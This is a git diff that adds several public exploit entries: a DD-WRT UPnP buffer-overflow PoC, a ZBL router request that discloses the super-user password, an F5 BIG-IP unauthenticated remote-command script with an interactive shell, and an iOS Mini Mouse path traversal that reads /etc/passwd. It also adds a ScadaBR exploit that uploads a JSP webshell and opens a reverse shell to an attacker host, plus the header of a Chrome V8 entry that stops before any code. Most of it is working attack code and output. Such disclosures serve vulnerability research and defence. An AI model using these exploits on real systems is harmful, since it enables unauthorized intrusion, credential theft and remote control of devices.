diff --git a/exploits/hardware/dos/49730.py b/exploits/hardware/dos/49730.py
new file mode 100755
index 000000000..384edb62f
--- /dev/null
+++ b/exploits/hardware/dos/49730.py
@@ -0,0 +1,28 @@
+# Exploit Title: DD-WRT 45723 - UPNP Buffer Overflow (PoC)
+# Date: 24.03.2021
+# Exploit Author: Selim Enes 'Enesdex' Karaduman
+# Vendor Homepage: https://dd-wrt.com/
+# Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/
+# Version: 45723 or prior
+# Tested on: TP-Link Archer C7
+
+# https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/
+
+import socket
+
+target_ip = "192.168.2.1" # IP Address of Target
+off = "D"*164
+ret_addr = "AAAA" 
+
+payload = off + ret_addr
+
+packet = \
+    'M-SEARCH * HTTP/1.1\r\n' \
+    'HOST:239.255.255.250:1900\r\n' \
+    'ST:uuid:'+payload+'\r\n' \
+    'MX:2\r\n' \
+    'MAN:"ssdp:discover"\r\n' \
+    '\r\n'
+
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+s.sendto(packet, (target_ip, 1900) )
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49737.txt b/exploits/hardware/webapps/49737.txt
new file mode 100644
index 000000000..7c409d555
--- /dev/null
+++ b/exploits/hardware/webapps/49737.txt
@@ -0,0 +1,82 @@
+# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
+# Date: 31.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com
+
+Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
+Product web page: http://www.zblchina.com | http://www.wd-thailand.com
+Affected version: Firmwre: V100R001
+                  Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
+                  EONU Hardware Version	V3.0
+                  Software: V2.46.02P6T5S
+                  Main Chip: RTL9607
+                  Master Controller, Copyright (c) R&D
+
+Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband
+router.
+
+Desc: The application suffers from a privilege escalation
+vulnerability. The limited administrative user (admin:admin)
+can elevate his/her privileges by sending a HTTP GET request
+to the configuration backup endpoint or the password page
+and disclose the http super user password. Once authenticated
+as super, an attacker will be granted access to additional and
+privileged functionalities.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5467
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php
+
+
+31.01.2021
+
+--
+
+
+Get config file and disclose super pwd:
+---------------------------------------
+
+POST /HG104B-ZG-E.config HTTP/1.1
+Host: 192.168.1.1
+Connection: keep-alive
+Content-Length: 42
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: https://192.168.1.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://192.168.1.1/system_configure.asp
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
+
+CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=
+
+
+...
+  #web_1
+    user_web_name=super
+    user_web_password=www168nettv
+...
+
+
+Disclose super pwd from system pwd page:
+----------------------------------------
+
+GET /system_password.asp
+Host: 192.168.1.1
+
+...
+var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2');
+var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin');
+...
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49738.py b/exploits/hardware/webapps/49738.py
new file mode 100755
index 000000000..0ca7f316a
--- /dev/null
+++ b/exploits/hardware/webapps/49738.py
@@ -0,0 +1,92 @@
+# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
+# Exploit Author: Al1ex
+# Vendor Homepage: https://www.f5.com/products/big-ip-services
+# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2
+# CVE : CVE-2021-22986
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+import sys
+
+
+def title():
+    print('''
+      ______ ____    ____  _______       ___     ___    ___    __        ___    ___     ___     ___      __   
+     /      |\   \  /   / |   ____|     |__ \   / _ \  |__ \  /_ |      |__ \  |__ \   / _ \   / _ \    / /   
+    |  ,----' \   \/   /  |  |__    ______ ) | | | | |    ) |  | |  ______ ) |    ) | | (_) | | (_) |  / /_   
+    |  |       \      /   |   __|  |______/ /  | | | |   / /   | | |______/ /    / /   \__, |  > _ <  | '_ \  
+    |  `----.   \    /    |  |____       / /_  | |_| |  / /_   | |       / /_   / /_     / /  | (_) | | (_) | 
+     \______|    \__/     |_______|     |____|  \___/  |____|  |_|      |____| |____|   /_/    \___/   \___/                                                                                                                                                                             
+    
+                                Author:Al1ex@Heptagram
+                                Github:https://github.com/Al1ex
+    ''')   
+
+def exploit(url):
+	target_url = url + '/mgmt/shared/authn/login'
+	data = {
+		"bigipAuthCookie":"",
+		"username":"admin",
+		"loginReference":{"link":"/shared/gossip"},
+		"userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"}
+	}
+	headers = {
+		"User-Agent": "hello-world",
+		"Content-Type":"application/x-www-form-urlencoded"
+	}
+	response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)
+	if "/mgmt/shared/authz/tokens/" not in response.text:
+		print('(-) Get token fail !!!')
+		print('(*) Tested Method 2:') 
+		header_2 = {
+		    'User-Agent': 'hello-world',
+		    'Content-Type': 'application/json',
+		    'X-F5-Auth-Token': '',
+		    'Authorization': 'Basic YWRtaW46QVNhc1M='
+		}
+		data_2 = {
+			"command": "run", 
+			"utilCmdArgs": "-c whoami"
+		}
+		check_url = url + '/mgmt/tm/util/bash'
+		try:
+			response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)
+			if response2.status_code == 200 and 'commandResult' in response2.text:
+				while True:
+					cmd = input("(:CMD)> ")
+					data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)}
+					r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)
+					if r.status_code == 200 and 'commandResult' in r.text:
+						print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
+			else:
+				print('(-) Not vuln...')
+				exit(0)
+		except Exception:
+			print('ERROR Connect')
+	print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]))
+	while True:
+		cmd = input("(:CMD)> ")
+		headers = {
+			"Content-Type": "application/json",
+			"X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])
+		}
+		data_json = {
+			"command": "run", 
+			"utilCmdArgs": "-c \'%s\'"%(cmd)
+		}
+		exp_url= url + '/mgmt/tm/util/bash'
+		exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)
+		if exp_req.status_code == 200 and 'commandResult' in exp_req.text:
+			print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
+		else:
+			print('(-) Not vuln...')
+			exit(0)
+
+if __name__ == '__main__':
+    title()
+    if(len(sys.argv) < 2):
+    	print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0]))
+    	exit(0)
+    else:
+    	exploit(sys.argv[1])
\ No newline at end of file
diff --git a/exploits/ios/webapps/49747.txt b/exploits/ios/webapps/49747.txt
new file mode 100644
index 000000000..0e9c08659
--- /dev/null
+++ b/exploits/ios/webapps/49747.txt
@@ -0,0 +1,397 @@
+# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
+# Author: gosh
+# Date: 05-04-2021
+# Vendor Homepage: http://yodinfo.com 
+# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
+# Version: 9.3.0
+# Tested on: iPhone; iOS 14.4.2
+
+GET /op=get_device_info HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 0
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+	"ret_code":	1,
+	"ret_msg":	"success",
+	"data":	{
+		"uuid":	"7E07125B-61BE-4F12-820C-FA706C445219",
+		"model":	"iPhone",
+		"sys_name":	"iOS",
+		"sys_version":	"14.4.2",
+		"battery_state":	0,
+		"battery_level":	-1,
+		"memery_total_size":	2983772160,
+		"device_name":	"mobile",
+		"user_name":	"iPhone",
+		"pwd":	"",
+		"dir_user":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
+		"dir_doc":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
+		"dir_desktop":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
+		"sys_type":	3
+	}
+}
+
+
+
+-------------------------------------------------------------------------------------
+
+
+POST /op=get_file_list HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 0
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+	"ret_code":	1,
+	"ret_msg":	"success",
+	"data":	{
+		"list":	[{
+				"path":	"//usr",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"usr",
+				"name_display":	"usr",
+				"file_size":	288,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//bin",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"bin",
+				"name_display":	"bin",
+				"file_size":	128,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//sbin",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"sbin",
+				"name_display":	"sbin",
+				"file_size":	544,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//.file",
+				"is_local":	true,
+				"is_hide":	true,
+				"is_floder":	false,
+				"name":	".file",
+				"name_display":	".file",
+				"file_size":	0,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//etc",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"etc",
+				"name_display":	"etc",
+				"file_size":	11,
+				"create_time":	1577865.600000,
+				"update_time":	1577865.600000,
+				"sys_type":	3
+			}, {
+				"path":	"//System",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"System",
+				"name_display":	"System",
+				"file_size":	128,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//var",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"var",
+				"name_display":	"var",
+				"file_size":	11,
+				"create_time":	1577865.600000,
+				"update_time":	1577865.600000,
+				"sys_type":	3
+			}, {
+				"path":	"//Library",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"Library",
+				"name_display":	"Library",
+				"file_size":	672,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//private",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"private",
+				"name_display":	"private",
+				"file_size":	224,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//dev",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"dev",
+				"name_display":	"dev",
+				"file_size":	1395,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//.ba",
+				"is_local":	true,
+				"is_hide":	true,
+				"is_floder":	true,
+				"name":	".ba",
+				"name_display":	".ba",
+				"file_size":	64,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//.mb",
+				"is_local":	true,
+				"is_hide":	true,
+				"is_floder":	true,
+				"name":	".mb",
+				"name_display":	".mb",
+				"file_size":	64,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//tmp",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"tmp",
+				"name_display":	"tmp",
+				"file_size":	15,
+				"create_time":	1577865.600000,
+				"update_time":	1577865.600000,
+				"sys_type":	3
+			}, {
+				"path":	"//Applications",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"Applications",
+				"name_display":	"Applications",
+				"file_size":	3296,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//Developer",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"Developer",
+				"name_display":	"Developer",
+				"file_size":	64,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}, {
+				"path":	"//cores",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"cores",
+				"name_display":	"cores",
+				"file_size":	64,
+				"create_time":	0,
+				"update_time":	0,
+				"sys_type":	3
+			}]
+	}
+}
+
+-------------------------
+using the data found: 
+/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download
+
+POST /op=get_file_list HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 101
+
+{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+	"ret_code":	1,
+	"ret_msg":	"success",
+	"data":	{
+		"list":	[{
+				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"GDT",
+				"name_display":	"GDT",
+				"file_size":	96,
+				"create_time":	1617228.400302,
+				"update_time":	1617228.400302,
+				"sys_type":	3
+			}, {
+				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	false,
+				"name":	"input_photo.jpg",
+				"name_display":	"input_photo.jpg",
+				"file_size":	6141491,
+				"create_time":	1617583.738397,
+				"update_time":	1617583.738402,
+				"sys_type":	3
+			}, {
+				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"Ico",
+				"name_display":	"Ico",
+				"file_size":	64,
+				"create_time":	1617583.334913,
+				"update_time":	1617583.334913,
+				"sys_type":	3
+			}, {
+				"path":	"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
+				"is_local":	true,
+				"is_hide":	false,
+				"is_floder":	true,
+				"name":	"Download",
+				"name_display":	"Download",
+				"file_size":	64,
+				"create_time":	1617228.371587,
+				"update_time":	1617228.371587,
+				"sys_type":	3
+			}]
+	}
+}
+
+----------------------------------------------------------------------
+
+GET /file=/etc/passwd HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 4
+
+{}
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/octet-stream
+Content-Range: bytes 0-0/2018
+Content-Length : 2018
+
+##
+# User Database
+# 
+# This file is the authoritative user database.
+##
+
+nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
+root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
+mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
+daemon:*:1:1:System Services:/var/root:/usr/bin/false
+_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
+_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
+_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
+_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
+_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
+_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
+_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
+_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
+_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
+_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
+_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
+_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
+_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
+_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
+_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
+_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
+_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
+_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
+_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
+_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
+_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
+_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
+_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
+_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
+_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
+_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false
\ No newline at end of file
diff --git a/exploits/linux/webapps/49735.py b/exploits/linux/webapps/49735.py
new file mode 100755
index 000000000..a68e7a479
--- /dev/null
+++ b/exploits/linux/webapps/49735.py
@@ -0,0 +1,115 @@
+# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)
+# Date: 04/21
+# Exploit Author: Fellipe Oliveira
+# Vendor Homepage: https://www.scadabr.com.br/ 
+# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
+# Tested on: Debian9,10~Ubuntu16.04
+
+#!/usr/bin/python
+
+import requests,sys,time
+
+
+if len(sys.argv) <=6:
+    print('[x] Missing arguments ... ')
+    print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>')
+    print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444')
+    sys.exit(0)
+else:   
+    time.sleep(1)
+
+host = sys.argv[1]
+port = sys.argv[2]
+user = sys.argv[3]
+passw = sys.argv[4]
+rev_host = sys.argv[5]
+rev_port = sys.argv[6]
+
+flag = False
+LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'
+PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'
+
+
+banner = '''
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+|    _________                  .___     ____________________       |
+|   /   _____/ ____ _____     __| _/____ \______   \______   \      |
+|   \_____  \_/ ___\\__  \   / __ |\__  \ |    |  _/|       _/       |
+|   /        \  \___ / __ \_/ /_/ | / __ \|    |   \|    |   \      |
+|  /_______  /\___  >____  /\____ |(____  /______  /|____|_  /      |
+|          \/     \/     \/      \/     \/       \/        \/       |
+|                                                                   |
+|    > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload   |
+|    > Exploit Author : Fellipe Oliveira                            |
+|    > Exploit for Linux Systems                                    |
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+'''
+
+def main():
+    payload = {
+        'username': user,
+        'password': passw
+    }
+
+    print(banner)
+    time.sleep(2)
+   
+    with requests.session() as s:
+        s.post(LOGIN, data=payload)
+	response = s.get(PROTECTED_PAGE)
+
+        print "[+] Trying to authenticate "+LOGIN+"..."
+	if response.status_code == 200:
+	    print "[+] Successfully authenticated! :D~\n"
+	    time.sleep(2)
+	else:
+	    print "[x] Authentication failed :("
+            sys.exit(0)
+
+
+        burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm"
+	burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
+	burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"}
+	burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n    InputStream is;\n    OutputStream os;\n    StreamConnector(InputStream is, OutputStream os) {\n        this.is = is;\n        this.os = os;\n    }\n    public void run() {\n        BufferedReader isr = null;\n        BufferedWriter osw = null;\n        try {\n            isr = new BufferedReader(new InputStreamReader(is));\n            osw = new BufferedWriter(new OutputStreamWriter(os));\n            char buffer[] = new char[8192];\n            int lenRead;\n            while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n                osw.write(buffer, 0, lenRead);\n                osw.flush();\n            }\n        } catch (Exception e) {\n            System.out.println(\"exception: \" + e.getMessage());\n        }\n        try {\n            if (isr != null)\n                isr.close();\n            if (osw != null)\n                osw.close();\n        } catch (Exception e) {\n            System.out.println(\"exception: \" + e.getMessage());\n        }\n    }\n}\n%>\n\n<h1>Payload JSP to Reverse Shell</h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"/>\n</form>\n\n<%\n    String ipAddress = request.getParameter(\"ipaddress\");\n    String ipPort = request.getParameter(\"port\");\n    Socket sock = null;\n    Process proc = null;\n    if (ipAddress != null && ipPort != null) {\n        try {\n            sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n            System.out.println(\"socket created: \" + sock.toString());\n            Runtime rt = Runtime.getRuntime();\n            proc = rt.exec(\"/bin/bash\");\n            System.out.println(\"process /bin/bash started: \" + proc.toString());\n            StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n            System.out.println(\"outputConnector created: \" + outputConnector.toString());\n            StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n            System.out.println(\"inputConnector created: \" + inputConnector.toString());\n            outputConnector.start();\n            inputConnector.start();\n        } catch (Exception e) {\n            System.out.println(\"exception: \" + e.getMessage());\n        }\n    }\n    if (sock != null && proc != null) {\n        out.println(\"<div class='separator'></div>\");\n        out.println(\"<p>Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".</p>\");\n    }\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n"
+	getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
+
+
+	print('[>] Attempting to upload .jsp Webshell...')
+	time.sleep(1)
+        print('[>] Verifying shell upload...\n')
+	time.sleep(2)
+	
+	if getdata.status_code == 200:
+	    print('[+] Upload Successfuly! \n')
+	    
+	    for num in range(1,1000):	    
+	    	PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)
+                find = s.get(PATH)
+
+                if find.status_code == 200:	
+                    print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))
+                    print('[>] Spawning Reverse Shell...\n')
+                    time.sleep(3)                    
+			
+		    burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port)
+		    burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
+		    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+		    r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
+		    time.sleep(5)
+		    
+		    if len(r.text) > 401:
+		        print('[+] Connection received')
+		        sys.exit(0)
+	       	    else:
+                        print('[x] Failed to receive reverse connection ...\n')    			
+
+		elif num == 999:
+                    print('[x] Failed to found Webshell ... ')
+                    
+	else:
+	    print('Reason:'+getdata.reason+' ')	   
+	    print('Exploit Failed x_x')
+
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/multiple/remote/49745.js b/exploits/multiple/remote/49745.js
new file mode 100644
index 000000000..da4ccf84d
--- /dev/null
+++ b/exploits/multiple/remote/49745.js
@@ -0,0 +1,111 @@
+# Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution
+# Date: 05/04/2021
+# Exploit Author: Tobias Marcotto
+# Original Author: r4j0x00
+# Tested on: Kali Linux x64 
+# Version: 87.0.4280.88
+# Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+# CVE: CVE-2020-16040
+# Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/
+
+*********************************************************************************************************
+
+
